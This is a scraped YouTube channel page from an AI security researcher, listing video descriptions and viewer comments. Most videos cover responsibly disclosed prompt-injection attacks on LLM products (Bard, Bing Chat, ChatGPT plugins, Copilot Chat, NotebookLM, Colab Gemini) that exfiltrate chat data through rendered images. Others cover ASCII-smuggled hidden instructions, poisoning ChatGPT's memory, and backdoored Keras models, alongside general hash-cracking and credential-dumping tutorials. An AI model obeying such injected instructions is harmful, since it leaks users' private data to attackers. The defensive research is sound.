Embrace The Red
Embrace The Red
  • Видео 41
  • Просмотров 697 714

Видео

Google Colab with Gemini AI - Prompt Injection Pirate Demo (POC)
Просмотров 21828 дней назад
In this proof-of-concept we show how indirect prompt injection from a notebook can turn Google Colab AI (Gemini) into a pirate and staging data for exfiltration. See blog post for details: embracethered.com/blog/posts/2024/google-colab-image-render-exfil/
GitHub Copilot Chat - From Prompt Injection to Data Exfiltration
Просмотров 7462 месяца назад
Details: embracethered.com/blog/posts/2024/github-copilot-chat-prompt-injection-data-exfiltration/ This security vulnerability was reported to Microsoft/GitHub in February 2024 and confirmed fixed in June 2024. See blog post for details.
LLM Vulnerability Scanning with garak. Tutorial: Test your own chat bots!
Просмотров 1,1 тыс.2 месяца назад
In this video we cover basic usage of garak, an LLM vulnerability scanner. In particular we explore how to test your own REST based LLM applications. This can be done by using the built-in REST generator and configure it to work with the target application. (volume of video after uploading to YoutTube is not super loud, so please adjust accordingly) Garak on Github: github.com/leondz/garak/ The...
ChatGPT: Hacking Memories via Images (Prompt Injection to Persistent Memories)
Просмотров 4262 месяца назад
Details: embracethered.com/blog/posts/2024/chatgpt-hacking-memories/ This was issue was disclosed to OpenAI in May 2024, but seen as a "model safety issue" and not a security vulnerability. *DISCLAIMER*: Penetration testing and red teaming requires authorization from proper stakeholders. Do not perform unauthorized or illegal activities. This content is for educational purposes to help secure s...
Backdooring Keras Models and How to Detect It (Machine Learning Attack Series)
Просмотров 4683 месяца назад
In machine learning model deserialization issues can lead to arbitrary code execution. This video explains the attack and how you can scan model files to protect your organization. This video covers backdooring the original Keras *Husky AI* model from the original *Machine Learning Attack Series*, and afterwards we investigate tooling to detect the backdoor. *DISCLAIMER*: Penetration testing an...
Bobby Tables but with LLMs: Google NotebookLM - Data Exfiltration POC
Просмотров 3403 месяца назад
This demo shows how a prompt injection attack hidden within a user's profile can lead to data exfiltration when processing untrusted data with NotebookLM. Detailed blog: embracethered.com/blog/posts/2024/google-notebook-ml-data-exfiltration/ Responsible Disclosure *Update:* After public disclosure the Google NotebookLM team reached to me and fixed the vulnerability within a few days! This vulne...
ASCII Smuggling: Crafting Invisible Text and Decoding Hidden Secrets -New Threat for LLMs and beyond
Просмотров 1,1 тыс.6 месяцев назад
This video provides a deep dive into ASCII Smuggling. It's possible hide invisible text in plain sight using Unicode Tags Block code points. Some Large Language Models (LLMs) interpret such hidden text as instructions, and some are also able to craft such hidden text! Additionally, this has implications beyond Machine Learning, AI and LLM applications, as it allows rendering of invisible text i...
Real-world exploits and mitigations in LLM applications (37c3)
Просмотров 22 тыс.7 месяцев назад
Video recording of my talk at the 37th Chaos Communication Congress in Hamburg titled "NEW IMPORTANT INSTRUCTIONS: Real-world exploits and mitigations in Large Language Model applications" about LLM app security and Prompt Injections specifically. A big thank you to the CCC organizers and all the volunteers for putting together such a great event! Source Video: media.ccc.de/v/37c3-12292-new_imp...
Hacking Google Bard: Prompt Injection to Data Exfiltration via Image Markdown Rendering (Demo Video)
Просмотров 6 тыс.9 месяцев назад
Demo video of end to end data exfiltration exploit via a malicious Google Doc. The exploit leverages an indirect prompt injection which injects an image markdown element which is the exfiltration channel. This vulnerability was responsibly disclosed to Google VRP on September, 19th 2023 and Google reported it as fixed October, 19th 2023. Details in this blog post: embracethered.com/blog/posts/2...
Data Exfiltration Vulnerabilities in LLM Applications and Chatbots: Bing Chat, ChatGPT and Claude
Просмотров 1,4 тыс.11 месяцев назад
During an Indirect Prompt Injection attack an adversary can inject malicious instructions to have a large language model (LLM) application (such as a chat bot) send data off to other servers on the Internet. In this video we discuss three techniques for data exfiltration, including proof-of-concepts I responsibly disclosed to OpenAI, Microsoft and Anthropic, a plugin vendor, and how the vendors...
Bing Chat - Data Exfiltration Exploit (responsibly disclosed to Microsoft and now fixed)
Просмотров 1,4 тыс.Год назад
This is the demo video I sent to Microsoft's Security Response Center when reporting the issue on April, 8th 2023. MSRC informed me on June, 15th 2023 that the vulnerability was fixed and hence can be disclosed publicly. Detailed Blog Post: embracethered.com/blog/posts/2023/bing-chat-data-exfiltration-poc-and-fix/
POC - ChatGPT Plugins: Indirect prompt injection leading to data exfiltration via images
Просмотров 4,4 тыс.Год назад
As predicted by security researchers, with the advent of plugins Indirect Prompt Injections are now a reality within ChatGPT’s ecosystem. Overview: User enters data 0:05 User asks ChatGPT to query the web 0:25 ChatGPT invokes the WebPilot Plugin 0:35 The Indirect Prompt Injection from the website succeeds 0:58 ChatGPT sent data to remote server 1:18 Accompanying blog post: embracethered.com/blo...
Adversarial Prompting - Tutorial + Lab
Просмотров 1,5 тыс.Год назад
Practical examples and try it yourself labs to help learn about and research Prompt Injections. Colab Notebook: colab.research.google.com/drive/1qGznuvmUj7dSQwS9A9L-M91jXwws-p7k The examples reach from simple scenarios, such as changing the output message to a specific text, to more complex scenarios such as JSON object injection as well as HTML/XSS and also Data Exfiltration. Intro & Setup 0:0...
Prompt Injections - An Introduction
Просмотров 5 тыс.Год назад
Many courses teach prompt engineering and currently pretty much all examples are vulnerable to Prompt Injections. Especially Indirect Prompt Injections are dangerous. They allow untrusted data to take control of the LLM (large language model) and give an AI a new instructions, mission and objective. This video aims to raise awareness of this rising problem. Injections Lab: colab.research.google...
Decrypting SSL/TLS browser traffic with Wireshark (using netsh trace start)
Просмотров 12 тыс.Год назад
Decrypting SSL/TLS browser traffic with Wireshark (using netsh trace start)
Simplify your life with ChatGPT API Shell Integration: Yolo your Bash + PowerShell Assistant (GPT-4)
Просмотров 9 тыс.Год назад
Simplify your life with ChatGPT API Shell Integration: Yolo your Bash PowerShell Assistant (GPT-4)
Grabbing and cracking macOS password hashes (with dscl and hashcat)
Просмотров 8 тыс.Год назад
Grabbing and cracking macOS password hashes (with dscl and hashcat)
SSH Agent Hijacking - Hacking technique for Linux and macOS explained
Просмотров 3,1 тыс.Год назад
SSH Agent Hijacking - Hacking technique for Linux and macOS explained
How to extract NTLM Hashes from Wireshark Captures for cracking with Hashcat
Просмотров 9 тыс.Год назад
How to extract NTLM Hashes from Wireshark Captures for cracking with Hashcat
SQL Injection Attacks For Beginners (Basics)
Просмотров 1,2 тыс.Год назад
SQL Injection Attacks For Beginners (Basics)
Server-Side Request Forgery (SSRF) hacking variations you MUST KNOW about!
Просмотров 565Год назад
Server-Side Request Forgery (SSRF) hacking variations you MUST KNOW about!
Dumping cleartext Wi-Fi passwords using netsh in Windows (netsh wlan show profiles)
Просмотров 1,8 тыс.Год назад
Dumping cleartext Wi-Fi passwords using netsh in Windows (netsh wlan show profiles)
Two ChatGPT bots using unofficial API to play Tic-Tac-Toe autonomously against each other
Просмотров 816Год назад
Two ChatGPT bots using unofficial API to play Tic-Tac-Toe autonomously against each other
SameSite Cookies for Everyone - Cross Site Request Forgery Mitigations (follow up)
Просмотров 3,7 тыс.Год назад
SameSite Cookies for Everyone - Cross Site Request Forgery Mitigations (follow up)
ChatGPT - Imagine you are a Microsoft SQL Server database server
Просмотров 562 тыс.Год назад
ChatGPT - Imagine you are a Microsoft SQL Server database server
ChatGPT - Commodore 64
Просмотров 1,1 тыс.Год назад
ChatGPT - Commodore 64
Understanding the basics of Cross-Site Request Forgery attacks
Просмотров 422Год назад
Understanding the basics of Cross-Site Request Forgery attacks
Pass the Cookies and Pivot to the Clouds
Просмотров 2862 года назад
Pass the Cookies and Pivot to the Clouds
Hacking Machine Learning Systems (Red Team Edition) - AI Hacker
Просмотров 4 тыс.2 года назад
Hacking Machine Learning Systems (Red Team Edition) - AI Hacker

Комментарии

  • @SaltyBalsZ
    @SaltyBalsZ 8 часов назад

    Should've put the voice volume higher and music lower. Almost shit my pants when outro started

  • @davidvidic
    @davidvidic 21 час назад

    sound?

    • @embracethered
      @embracethered 7 часов назад

      Thanks for the comment. It's a video complementing the recent blog post. But you have a good point, maybe I should start speaking to these exploit demos, so they work as stand alone videos also.

  • @itamarcohen331
    @itamarcohen331 2 дня назад

    What is that key file? how do i create it and use it? I created it from scratch but after doing the commands it has 0 length

    • @embracethered
      @embracethered 2 дня назад

      It will be created automatically if the environment variable has been set, not all browsers might support it. Also see embracethered.com/blog/posts/2023/decrypt-wireshark-traffic-https-netsh/

  • @user-td4pf6rr2t
    @user-td4pf6rr2t 10 дней назад

    Do something fun like reflective shell function deceleration.

  • @mo.inshasi9049
    @mo.inshasi9049 12 дней назад

    prefect , thank you !

  • @donatocapitella
    @donatocapitella 28 дней назад

    As usual, Johann is our mighty god of prompt injection 🙏🙏🙏 does this work everywhere with the Gemini side panel? I noticed that Gemini has become quite aggressive with validating links, but I guess Google domains are whitelisted?

    • @embracethered
      @embracethered 28 дней назад

      Thanks for checking it out! 🙂 The side panel in Workspaces and Drive etc seems different to other offerings (like Colab). The only thing common might be the name (and usage of same backend model), the actual LLM app integration is different. I don't show it in the video or blog post, but currently there is also no toxicity output filtering (so with some prompting tricks you can make Colab's Gemini swear to the user if they open a notebook from untrusted source) - I shared with Google and hopefully they'll improve content moderation soon.

  • @user-zm6ld2qq8p
    @user-zm6ld2qq8p 28 дней назад

    First I read blog pn gitbook then come here to watch poc

    • @embracethered
      @embracethered 28 дней назад

      Thanks for reading and watching! Hope it's helpful to understand some of the novel appsec risks we face with AI applications!

    • @user-zm6ld2qq8p
      @user-zm6ld2qq8p 28 дней назад

      @@embracethered yes I have to connect with you for some guidance where I can connect with you ?

  • @cyberprotec
    @cyberprotec 29 дней назад

    Thanks for this content. Will you be able to assist with setting up a GPU Env for Garak Scan? Been working on this for a while. EC2 with ML AMI?

    • @embracethered
      @embracethered 28 дней назад

      Hey thanks for watching! What is the issue you are running into with these AMIs? A good suggestion might also be to join the garak discord to see if anyone has experience with EC2 and ML AMIs - lot's of helpful folks there.

    • @cyberprotec
      @cyberprotec 28 дней назад

      @@embracethered Thanks for the feedback. I am on the discord. I have dropped this but it seems like no one is doing that. I am trying to build a prod integration with our Jira in a way that when Devs request for a model via jira, a workflow kickes in, API gateway will collect the model name and use a Lambda to trigger Garak on the instance, scan the model, then export a zip of the report to Jira and Slack. I have part of the integration just running into issues setting up garak to use the GPUs on the instance. I have checked the GPUs [lsmod | grep nvidia] [nvidia-smi] they are running but Garak is not using them. It would rather use CPU and Memory. There are 4 GPUs with a total of 98gb memory. Garak attempts to use 1 and once the memory on the single GPU max out [˜23gb], the garak process crashes.

  • @imvadimzz6483
    @imvadimzz6483 Месяц назад

    ive downloaded the seclists on the terminal but i dont know which commanad to type to activate a wordlist

  • @Sumukh30
    @Sumukh30 Месяц назад

    I have 4 rest apis, 1st api request has injection point and 4th api has response for tool to analyse.. in this case how to write config.json file? Does tool support multiple requests

    • @embracethered
      @embracethered Месяц назад

      Garak supports creating custom generators for dialogue based systems - I think for what you describe that's probably best. Search for garak.generators.base in documentation. Hope that helps.

  • @tristanmartin49
    @tristanmartin49 Месяц назад

    Thank you for the well articulated and educational content :)

  • @samadborz
    @samadborz Месяц назад

    Thanks man thats help me a lot ! :) ;)

  • @joshuakawamata5406
    @joshuakawamata5406 Месяц назад

    thank you for this,,,

    • @embracethered
      @embracethered Месяц назад

      Glad it's useful! Thanks for checking it out!

  • @user-zm6ld2qq8p
    @user-zm6ld2qq8p 2 месяца назад

    Please meke more videos on AI/ML security [ offensive part] but need to be cover basic I just love your videos so request you as one honest student

    • @embracethered
      @embracethered 2 месяца назад

      Thanks for the kind words! Reallly appreciate it. Will look into it. Have you watched: ruclips.net/video/JzTZQGYQiKw/видео.html yet? :)

    • @user-zm6ld2qq8p
      @user-zm6ld2qq8p 2 месяца назад

      @@embracethered I started to watch that playlist!

  • @berthold9582
    @berthold9582 2 месяца назад

    Très bien expliqué monsieur 🎉

  • @185_arnabroy2
    @185_arnabroy2 2 месяца назад

    Thank You very much, for this Video...Steve Jobs....

    • @embracethered
      @embracethered 2 месяца назад

      Sure thing! Thanks for watching!

  • @novaland.
    @novaland. 2 месяца назад

    very useful video thank you very much !

    • @embracethered
      @embracethered 2 месяца назад

      Glad it was helpful! And thanks for watching!

  • @nickbritt
    @nickbritt 2 месяца назад

    Great walk through I’ve been following along for a while now, the ascii smuggling tool is great. Is there a public place where we could try this tool out via a bug bounty program or similar? When I looked at the in scope items hallucinations and attacks like DAN are out of scope.

    • @embracethered
      @embracethered 2 месяца назад

      Thanks for watching! 🙏 Great question, it depends on program. bug bounty programs (and industry at large) are a bit behind when it comes to considering novel LLM appsec issues, and there end to end but also long term implications. I often have lengthy threads with companies behind the scenes to help educate and explain, and it always starts with "not applicable", "model safety" issue,... and eventually turns into a fix/improvements - including a few findings about ASCII smuggling I hope to share in coming weeks/months. To explore and research i often create small toy apps myself to debug and help understand what could go wrong. Again, thanks for watching and let me knowing there is any specific topic you'd like me to cover in future?

    • @nickbritt
      @nickbritt 2 месяца назад

      @@embracethered honestly I’ll be reading the blog and watching regardless. I really enjoy the data exfiltration techniques you shared. But I guess anything that would carry more impact to anyone implementing AI in their web application’s or areas that you deem has the most impact on the underlying models.

  • @LeonDerczynski
    @LeonDerczynski 2 месяца назад

    Beautiful. Thank you!

    • @embracethered
      @embracethered 2 месяца назад

      Thanks! Hope it's useful and helps some to get started! 🙂

  • @donatocapitella
    @donatocapitella 3 месяца назад

    Thank you for sharing this!

    • @embracethered
      @embracethered 3 месяца назад

      Thanks for watching! Check out the related blog post also. Also, let me know if there is any content you'd like to see covered in future. 🙂

  • @octopus3141
    @octopus3141 3 месяца назад

    Great stuff 👍

    • @embracethered
      @embracethered 3 месяца назад

      Thanks for the visit and note. Appreciate it! Let me know if there are any relevant topics you'd like to see covered?

  • @Agathozerk
    @Agathozerk 3 месяца назад

    nice video bru

    • @embracethered
      @embracethered 3 месяца назад

      Thanks! Let me know if there are other topics of interest?

  • @user-or7kk7gh8u
    @user-or7kk7gh8u 4 месяца назад

    Can you please share what .py file you has run on this video to monitor chatgpt3.5 chat (print-data-exfiltration-log.py) under code please share

    • @embracethered
      @embracethered 4 месяца назад

      It was just a script that filters the web server log for requests from ChatGPT user agent and only shows the query parameter and no request IP - so it's easier to view. You can just grep /var/log/ngninx/access.log also (assuming you use nginx on Linux). I can see if I still have the script somewhere but it wasn't anything special.

  • @pez5491
    @pez5491 4 месяца назад

    Gold!

  • @maloseevanschaba7343
    @maloseevanschaba7343 4 месяца назад

    Perfect straight to the point,

  • @Astranix59
    @Astranix59 5 месяцев назад

    What wordlist file do you use?

    • @Astranix59
      @Astranix59 5 месяцев назад

      @@embracethered thank you!!

  • @chitchatvn5208
    @chitchatvn5208 5 месяцев назад

    Thanks. Great content!

  • @chitchatvn5208
    @chitchatvn5208 5 месяцев назад

    Thanks Yohann.

  • @chitchatvn5208
    @chitchatvn5208 5 месяцев назад

    Thanks Yohann.

    • @embracethered
      @embracethered 5 месяцев назад

      Glad you found it interesting! Thanks for checking it out!

  • @chitchatvn5208
    @chitchatvn5208 5 месяцев назад

    thanks Yohann.

    • @embracethered
      @embracethered 5 месяцев назад

      Thank you! Hope it was useful! 🙂

  • @chitchatvn5208
    @chitchatvn5208 5 месяцев назад

    Thanks Johann.

  • @6cylbmw
    @6cylbmw 5 месяцев назад

    I didn't really understand the vulnerability impact. You are exfiltrating own chat (user A) to own drive (user A) drive. How is it exploitable?

    • @embracethered
      @embracethered 5 месяцев назад

      Attacker is causing the Chatbot to send past chat data to attackers server (in this case a google doc is capturing the exfiltrated data). Check out the linked blog post, explains it in detail.

  • @endone3661
    @endone3661 5 месяцев назад

    what is this ?

    • @embracethered
      @embracethered 5 месяцев назад

      It's about a Jupyter Notebook that allows to self-study prompt injection and to experiment and play around with the technique by solving a set of challenges.

  • @th3pac1fist
    @th3pac1fist 5 месяцев назад

    🔥

    • @embracethered
      @embracethered 5 месяцев назад

      Thanks!! It's probably one of my most interesting videos.

  • @RandomAccess2
    @RandomAccess2 5 месяцев назад

    [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "c:\temp\sslkeys\keys", "MACHINE") netsh trace start capture=yes tracefile=c:\temp\sslkeys\trace.etl report=disabled netsh trace stop

  • @notV3NOM
    @notV3NOM 6 месяцев назад

    Thanks , great insights

    • @embracethered
      @embracethered 6 месяцев назад

      Thanks for watching! Glad it was interesting.

  • @erinclay4917
    @erinclay4917 6 месяцев назад

    How'd you get that cool paint splash effect around your head? What software are you using?

    • @embracethered
      @embracethered 6 месяцев назад

      Thanks! It's just a custom image I created. drew a white circle on black background - then zigzagged that splash effect over with a brush and then use a filter for webcam in OBS to blend it in.

  • @void-qy4ov
    @void-qy4ov 6 месяцев назад

    Great tut. Thanks 👍

    • @embracethered
      @embracethered 6 месяцев назад

      Glad it was helpful! Thanks for watching!

  • @Sway55
    @Sway55 6 месяцев назад

    how to do it for traffic outside of browser? say I have a desktop app

  • @TheHologr4m
    @TheHologr4m 7 месяцев назад

    Was not expecting this in the playlist.

  • @petraat8806
    @petraat8806 7 месяцев назад

    im trying to understand what just happened please can someone explain

    • @embracethered
      @embracethered 7 месяцев назад

      You can read up on the details here: embracethered.com/blog/posts/2023/google-bard-data-exfiltration/ And if you want to understand the big picture around LLM prompt injections check out this talk m.ruclips.net/video/qyTSOSDEC5M/видео.html Thanks for watching!

  • @kajalpuri3404
    @kajalpuri3404 7 месяцев назад

    Thank you so much. Exactly the video I needed.

  • @plaverty9
    @plaverty9 7 месяцев назад

    I just tried this, but the only difference is I was capturing this information over HTTP instead of SMB. Does that make a difference? I ask because I was trying to generate a proof of concept where I controlled the username and password going in, but it wouldn't crack. I tried four different times and it didn't work. Is something different when these are captured over HTTP instead of an SMB connection?

    • @embracethered
      @embracethered 7 месяцев назад

      Good question. First thought is that it should just work the same, but I haven't tried. Relaying def works, that I have done many times in past.

    • @plaverty9
      @plaverty9 7 месяцев назад

      Thanks. I had a colleague try it too, and got the same result as I did. This is for a pentest proof of concept, so I’m not in position to relay unfortunately.

  • @netor-3y4
    @netor-3y4 7 месяцев назад

    ff

  • @347my455
    @347my455 7 месяцев назад

    superb!

  • @Fitnessdealnews
    @Fitnessdealnews 7 месяцев назад

    One of the best presentation I’ve seen

    • @embracethered
      @embracethered 7 месяцев назад

      Thanks for watching! Really appreciate the feedback! 😀

  • @MohdAli-nz4yi
    @MohdAli-nz4yi 7 месяцев назад

    I think a better conclusion is: never put in the context of an LLM information you need to keep private, because it will leak.

    • @embracethered
      @embracethered 7 месяцев назад

      Thanks for watching and the note. I think that misses the point that the LLM can attack the hosting app/user, so developers/users can't trust the responses. this includes confused deputy issues (in the app), such as automatic tool invocation.

    • @MohdAli-nz4yi
      @MohdAli-nz4yi 7 месяцев назад

      @@embracethered Agreed! So 2 big points: 1. Never put info in LLM context you don't want to leak. 2. Never put untrusted input into LLM context, it's like executing arbitrary code you have downloaded from the internet on your machine. LLM inputs must always be trusted, because the LLM will "execute" it in "trusted mode".

    • @embracethered
      @embracethered 7 месяцев назад

      @@MohdAli-nz4yi (1) I agree we shouldn't put sensitive information, like passwords, credit card number, or sensitive PII into chatbots. For (2) The challenge is that everyone wants to have an LLM operate over untrusted data. And that's the problem that hopefully one day will have a deterministic and secure solution. For now the best advise is to not trust the output. e.g. Developers shouldn't blindly take the output and invoke other tools/plugins in agents or render output as HTML, and users shouldn't blindly trust the output because it can be a hallucination (or a backdoor), or attacker controlled via an indirect prompt injection. However, some use cases might be too risky to implement at all. And its best to threat model implementations accordingly to understand risks and implications.

  • @ludovicjacomme1804
    @ludovicjacomme1804 7 месяцев назад

    Excellent presentation, thanks a lot for sharing, extremely informative.

    • @embracethered
      @embracethered 7 месяцев назад

      Thanks for watching! Glad to hear it's informative! 🙂

  • @artemsemenov8136
    @artemsemenov8136 7 месяцев назад

    Thank you, is awesome!

    • @embracethered
      @embracethered 7 месяцев назад

      Glad you like it!

    • @artemsemenov8136
      @artemsemenov8136 7 месяцев назад

      @@embracethered I'm a fan of yours, I've talked about your research at cybersecurity conferences in Russia. You're awesome.

    • @embracethered
      @embracethered 7 месяцев назад

      Thank you! 🙏